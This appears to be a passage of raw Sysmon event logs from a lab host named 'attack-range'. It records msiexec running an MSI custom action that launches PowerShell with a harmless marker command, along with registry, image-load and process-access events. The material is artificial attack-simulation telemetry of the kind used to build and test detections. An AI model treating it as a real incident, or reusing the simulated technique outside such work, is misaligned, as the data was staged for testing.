15:05:12.897{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002698870Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.897{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002698869Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.897{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI601C.tmp2022-06-17 15:05:12.897NT AUTHORITY\SYSTEM 13241300x80000000000000002698868Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceDWORD (0x00000001)NT AUTHORITY\SYSTEM 12241200x80000000000000002698867Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 13241300x80000000000000002698866Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002698865Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerBinary DataNT AUTHORITY\SYSTEM 12241200x80000000000000002698864Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002698863Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 10341000x80000000000000002698862Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}48402548C:\Windows\system32\msiexec.exe{7CF983DC-9826-62AC-3B6B-000000006202}4244C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19fdbd|C:\Windows\system32\Msi.dll+2ea9e|C:\Windows\system32\Msi.dll+474f5|C:\Windows\system32\Msi.dll+10b3b5|C:\Windows\system32\Msi.dll+10a5d6|C:\Windows\system32\Msi.dll+f4b9f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 734700x80000000000000002698861Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll4.8.3761.0 built by: NET48REL1Assembly managerMicrosoft® .NET FrameworkMicrosoft Corporationfusion.dllMD5=2A73BA7551F7B631AA484CAABD372F06,SHA256=F876EEEC603221DCDD098D1E2A1118012254E9C67851E749DF61D573EA949F55trueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002698860Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002698859Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 254200x80000000000000002698858Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f514a.msi2022-06-13 14:04:24.0002022-06-17 15:05:12.866NT AUTHORITY\SYSTEM 10341000x80000000000000002698857Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.866{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002698856Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.866{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002698855Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f514a.msi2022-06-17 15:05:12.866NT AUTHORITY\SYSTEM 23542300x80000000000000002698854Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f514a.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 11241100x80000000000000002698853Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.866{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f514a.msi2022-06-17 15:05:12.866NT AUTHORITY\SYSTEM 534500x80000000000000002698125Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.491{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002698119Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteKey2022-06-17 15:05:12.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002698118Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:12.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerNT AUTHORITY\SYSTEM 12241200x80000000000000002698117Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:12.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashNT AUTHORITY\SYSTEM 12241200x80000000000000002698116Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:12.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceNT AUTHORITY\SYSTEM 12241200x80000000000000002698115Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002698114Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002698111Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002698109Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002698108Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002698106Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 23542300x80000000000000002698105Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.475{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5149.msiMD5=B4DFDB4509DCB4B46CD5C654612D88BB,SHA256=16E90C61C9F253F5AB98100BA113E4E2970C3AF603F036ED12D6AE121C57B678falsetrue 23542300x80000000000000002698053Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.459{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI5E47.tmpMD5=52E020CF3FCDD1357E769B95FB36072F,SHA256=6F2F3FE71A9673C8D9AD17517D51595182622CBD12FEEAEA93E313267CBE29BDtruetrue 10341000x80000000000000002698047Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.459{7CF983DC-9828-62AC-466B-000000006202}25364024C:\Windows\System32\MsiExec.exe{7CF983DC-9828-62AC-476B-000000006202}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Installer\MSI5E47.tmp+10ef|C:\Windows\System32\msi.dll+ea965|C:\Windows\System32\msi.dll+afe66|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002698046Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.466{7CF983DC-9828-62AC-476B-000000006202}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -nop -Command Write-Host CustomAction export executed me; exitC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 4F5D5687D3E790ACEA8C2DFA6BC0C5ACWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698045Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.459{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\Installer\MSI5E47.tmp-----MD5=52E020CF3FCDD1357E769B95FB36072F,SHA256=6F2F3FE71A9673C8D9AD17517D51595182622CBD12FEEAEA93E313267CBE29BDfalse-UnavailableWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002698044Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.459{7CF983DC-9828-62AC-466B-000000006202}25363512C:\Windows\System32\MsiExec.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\MsiExec.exe+6bca|C:\Windows\System32\MsiExec.exe+7166|C:\Windows\System32\MsiExec.exe+8df7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000002698043Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698042Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698041Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698040Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698039Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698038Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698037Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698036Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002698035Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698034Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698033Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698032Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698031Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698030Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698029Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698028Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft 